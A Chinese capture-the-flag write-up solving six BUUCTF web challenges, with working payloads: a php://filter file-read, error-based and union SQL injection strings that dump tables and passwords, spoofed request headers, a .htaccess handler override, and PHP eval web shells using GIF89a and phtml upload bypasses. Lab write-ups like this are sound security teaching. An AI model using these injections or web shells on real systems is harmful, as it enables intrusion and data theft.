BUUCTF-WEB(9-14)

[极客大挑战 2019]Secret File

打开题目查看源码,找到了一个文件

然后就是一个按钮,点击后,他应该是反应了,但是我们看不到

那我们抓包看看,这里是Burp抓包后,发到重发器发送了一遍,看看响应包,发现了

然后访问这个网页就是一个源码

这里没有过滤php://filter

?file=php://filter/read=convert.base64-encode/resource=flag.php

base64解密后得到flag

[极客大挑战 2019]LoveSQL

先用万能账号密码试试,成功登录

1'or true#

登陆进去没啥用,可能藏在数据库了,这次我们用报错注入,因为我试了,他会有报错语句

爆库名

1' and extractvalue(1,concat(0x7e,(select database()),0x7e))or '

爆表名

1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='geek'),0x7e))or '

先爆这个love这个表里面的列,毕竟他和题目一样名字

1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'),0x7e))or '

然后爆数据(我觉得我挺傻逼,我爆到第15行才有flag,纯手搓)

1' and extractvalue(1,concat(0x7e,(select password from l0ve1ysq1 limit 15,1),0x7e))or '

然后我发现死活得不到后半段,只要一看16行就报错,我也是不懂了,所以最后我就正常得到数据的

1' union select 1,2,group_concat(password) from l0ve1ysq1#

[极客大挑战 2019]Http

打开题目发现是卖鞋厂,我也是慌了,看看源代码有没有信息吧

找到了,那我们就访问一下

抓包开搞:

说我不是这里来的

Referer:https://Sycsecret.buuoj.cn

又提示不是这个浏览器

User-Agent: Syclover

又提示不是本地访问

X-Forwarded-For:127.0.0.1

总的请求头就是这个:

拿下flag:

[极客大挑战 2019]Knife

蚁剑直接连接

根目录找到flag

[极客大挑战 2019]Upload

这道题就是我发现可以上传.htaccess文件

所以这里我就抓包上传

<IfModule mime_module>
SetHandler application/x-httpd-php
</IfModule>

然后开始上传图片马

这道题过滤了 <? 所以常规的一句话木马我们是不能上传的

<script language="php">@eval($_POST['cmd'])</script>

上传成功后,没有返回路径,我们猜测在upload的文件夹下,访问一下果然有

那我们就找到我们上传的一句话木马的文件,开始试着蚁剑连接

发现不行,好像是.htaccess这个文件不起作用

那我们用后缀名绕过 phtml

GIF89a
<script language="php">eval($_REQUEST['cmd'])</script>

然后用蚁剑连接

根目录找到flag

[ACTF2020 新生赛]Upload

这道题就是MIME绕过就行,还有一些后缀名被过滤了

后缀名我们就用phtml,这个是可以被解析的

蚁剑连接,根目录找到flag

热门相关:疯狂原始人2   山那边   DC超级英雄美少女年度英雄   姐姐的朋友2   史酷比和墨西哥大脚怪